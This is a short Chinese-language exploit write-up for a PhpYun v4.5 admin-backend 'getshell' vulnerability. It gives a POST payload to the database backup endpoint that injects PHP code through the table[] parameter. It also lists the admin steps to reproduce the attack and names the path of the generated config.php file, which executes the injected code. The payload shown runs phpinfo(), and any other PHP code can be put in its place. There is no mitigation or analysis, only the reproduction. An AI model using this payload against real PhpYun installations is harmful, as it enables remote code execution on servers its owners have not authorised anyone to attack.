003-Phpyun v4.5 后台getshell

# Phpyun v4.5 后台getshell

### 一、漏洞简介

### 二、漏洞影响

Phpyun v4.5

### 三、复现过程

payload:

“`bash
Url: http://url/admin/index.php?m=database&c=backup

Post:
pytoken=3c3140b58f5e&table[]=]=1;phpinfo();//&maxfilesize=1111
“`

漏洞复现过程: 首先进入后台-》点击工具-》数据-》数据库管理-》自定义备份-》随便选择一个表-》提交备份

![](/static/lingzu/images/15893365748715.png)

抓包,修改table[] 参数-》发送

![](/static/lingzu/images/15893365817382.png)

![](/static/lingzu/images/15893365857997.png)

产生的文件就在uploads/data/plus/bdata/phpyun_20200312153927/config.php

Url:访问(这里搭建的时候环境,我默认指向了uploads)

![](/static/lingzu/images/15893365949820.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容